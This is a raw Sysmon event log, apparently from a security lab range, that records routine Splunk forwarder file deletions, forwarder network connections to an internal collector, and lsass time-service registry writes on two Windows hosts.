23542300x8000000000000000102738Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:06.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6544BD64D1F229858EBB11C99E9EAD72,SHA256=AB59EFE54A177761500E684B213C19AF0547D58A7633074CDAAB7C4BC313756B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080567Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:06.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579B703F840423E33DD9AE14E7604424,SHA256=35DFBE587098D382E348C8604D15C32167CFC48719E18EEF8B5C15E9C6C9B741,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102737Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:06.467{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56D19E3B21A48586D25B0764E503BD45,SHA256=5B8A1063DFE542654498878A70E4ACE182FAF2B18BA7B35E853E857076F7F060,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102739Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:07.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9767DE53C738D37A9F67D663706D6C0B,SHA256=5801F39F503CE728A50F5570A998696D47E0A837C837878222D3D54B96E848DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080568Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:07.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B2E959CB86316A633C23237A3013C96,SHA256=55BBFF4635EEAE1C4336725319F090B5437F05C109736F56F7CCA41E6B6F45EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102740Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:08.857{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E58C551547197ED141469C34CC7833D3,SHA256=BAEEEF56C22F01D91E2B15D9D51CB556F1BBFCB13A8C6575C3F8FAA6949602BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080569Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:08.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC1C85FDEF5EC34AC3B4AD3926F6B857,SHA256=A5268D46D7AED15C09FB2443681F35C3D13FE0BB1686232F9E8CC0F92DAA842A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102742Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:08.322{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49460-false10.0.1.12-8000- 23542300x8000000000000000102741Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:09.889{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E28701A3580949B510134075EF35997B,SHA256=3FC0C8BB003AF3D61E2B20AE00FCB085F088292BFECF8E3379C49BD3B6A4DD49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080570Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:09.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8536012A723A875C2893F55B0106E1D,SHA256=FAAEF8151157DD13827E8BC25126082434DD8F3BF94B6EC116B12AA9A3AE6E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102743Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:10.904{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3896FF5DEDE7B2B0309091EB74F245F8,SHA256=51C9D21F3E90371B4A6D8AB8F6A5106EE550B2EB8C5A6E89E3A620B54F6378A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080572Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:10.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34E9E664BCEF8D689ECB632B79A0583B,SHA256=F4D7630C8CE734C355E0C8ED71CC1923651AD2BDBA853A23FF7EA1AF5AEA6738,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080571Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:07.808{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49970-false10.0.1.12-8000- 23542300x8000000000000000102744Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:11.935{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E752AE807AA9C5F4FD033D26116D186F,SHA256=0FEF76677DF3B831916A307576526D68D3E32AF8535D6E017CF4206D5F2E559F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080573Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:11.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF7ED0459F4E762879212BADB4675D6,SHA256=449F4582975405E75F1152BA6500A16925EBF61E16E5429F8C3DB834CF2F3556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102745Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:12.935{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DAA14D8ECCAD98DBB60FC0D5E51C01E,SHA256=70C7ABDA8919990A5E1453F341CB98BCA7C787B1C2C61711B83AA920C48D9CD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080574Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:12.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B861725B30900F6C81D99B4E8C297E2,SHA256=1B1EC3E92DC420F772A8568F7309C0F839920E0923DD839FC767294B7F2C438E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102746Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:13.935{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A433B020AA70D5D65B736BDF8846B785,SHA256=DB0E269E56B20537E301ABF9DAE747E03AE8655C0017B844AA7AC977BEF59A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080575Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:13.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EB15956867803969C61DF5541687545,SHA256=6289D805EFF082A811CDDC8090C3EC5FB749B367FFC3ECF6EC9CE767B3E2C8AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102748Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:14.937{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1D52C7A916302D4FBA5089259D0CE1B,SHA256=1EEF206111033FEFE61F361E28F74EFD87931F62945B45E22EE99C324A1007B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080576Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:14.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD9C166D2862A33E3CFF9A93593F72E8,SHA256=D638AE85E5FE68B1A0D22BAEF5B75DFBF77928D57D3DE2F398FE5D5296ACE781,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102747Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:14.611{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-018MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102750Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:15.947{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2162D05F93C7C31DCC8882A482DF9E2,SHA256=70342E969BB76162FF34F5A4267EE4ED310CDFB0443A107B9FB7B0A8FF8CCC32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080577Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:15.616{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65DCEFA0530E2F19B2FB7E583CDC94A6,SHA256=0A5B2D509F32CDD68E12BA9B351B7991FB5C82E90488535F74377C71D6B769EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102749Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:15.610{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-019MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102752Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:16.952{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52B6227C07A438B0F7551A7DF73DDD59,SHA256=0BA887626D8E311578BCAFECCF35AC1E26BA4BE636381360E0D3EE49CE3866C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080579Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:13.822{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49971-false10.0.1.12-8000- 23542300x800000000000000080578Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:16.628{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D36B6635EF547191E9D4F5CF71CF248,SHA256=755547B11A6C9FB2AD28C9BCCDFC80BC47F49F0FD72948560BA0257F5CDF5712,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102751Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:14.307{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49461-false10.0.1.12-8000- 23542300x800000000000000080580Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:17.628{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C23381FDC77CF5BDCDB4A09D6B453178,SHA256=FBD54D43E747DF08A4A6F3C111903FBBBADD8A1789553B5C1A493051833584F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080582Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:18.956{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=40D1E2B2E43ADF8CE4EB3646B043C216,SHA256=ED49F5201BCA5E926723AA0A849BA42F06B70A89E075CEF628CF46718DF588E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080581Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:18.628{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1662D6F5DD9753CBE4C2905919E38204,SHA256=3665130A240B5194F566993510B4B0409F683AE718235E1F93672122D3A5FE0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102753Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:17.999{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D286519B9E09EBB756CFFAC355532241,SHA256=F1F1D88D84ABFE1CF4D18C9B4CB78D9D0B1C9D928EE3F8DA382E22054B199D3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080583Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:19.628{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B6EF111BAB15AC0A9B372C59F58670D,SHA256=962BB763AC714A4D2646C65A235F5BD5ED8815D46C16D0DFDE3869A510A5C465,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102754Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:18.999{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7626A88247AC245A675184E29E2A3C38,SHA256=06B279F07B53F9C503676788E7387B14B981BD2385E6FE7DC9D01BA2B79A76BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080594Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:20.628{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80272EBF8E8BB3B7EF18A38C1F645BB2,SHA256=81CB391E8C22C110257CD5D3ECEC7C84A33E99D5415DB3AEAB362FD96D03C9FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102755Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:20.014{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A72BD4A70154A5005092C3623B4463A,SHA256=5FD4B2B2A8F0EA790CF5F151FE9DE1804625AA915E2EC3C9F5E965F8A2CB8EF9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000080593Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000080592Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0012f6bc) 13241300x800000000000000080591Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8eb-0x89cfe020) 13241300x800000000000000080590Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f3-0xeb944820) 13241300x800000000000000080589Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fc-0x4d58b020) 13241300x800000000000000080588Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000080587Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0012f6bc) 13241300x800000000000000080586Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8eb-0x89cfe020) 13241300x800000000000000080585Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f3-0xeb944820) 13241300x800000000000000080584Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:46:20.550{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fc-0x4d58b020) 354300x800000000000000080596Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:19.616{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49972-false10.0.1.12-8000- 23542300x800000000000000080595Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:21.629{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04AAE5879A0F5D040B031B98053832BF,SHA256=E5FC9BAA7C40AA37AAC393852E51DCD6A716A74F967A63FE387F981A4665C6A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102757Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:19.433{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49462-false10.0.1.12-8000- 23542300x8000000000000000102756Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:21.030{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4637AD3486D15BDA6CA7FFF1312457C8,SHA256=CCC69E02715C83C7FA7982A613633A3465113179F81502ADF10BB062945912A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080597Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:22.629{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBD7B6C28A7B152287C3B252D571F753,SHA256=D13B5CFA1E3469AB50C06B068CA2648DA57ECDB358C588CD2538ED6A556A5557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102758Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:22.030{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5790F67BA6C1C7F7C1BB5CD4B89CBC40,SHA256=2271454782D5452DD2EC4E4FAE5A409E6DAD46FA1446159192693E691FC39308,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080598Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:23.629{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=604CCC3BD26AF8CC0B78C5FB0A4446A4,SHA256=C72C11085D62F4AC2C183CF848AADAECBED742E8428626996ECEB746A43A3451,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102759Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:23.030{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=221AF4B17050F45266BC046B81FB0FD7,SHA256=AF2B1A386E7FCF8DFA43C29C73E3850B12B99FD7DD52A958D3386B104462D71D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080599Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:24.629{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5E5A40E69428BF2527E6F88CF5CF730,SHA256=08F51A6194705DEE1636773FBF55E3B9531809265F0AA1B6C353BB09E30CF73B,IMPHASH=00000000000000000000000000000000falsetrue 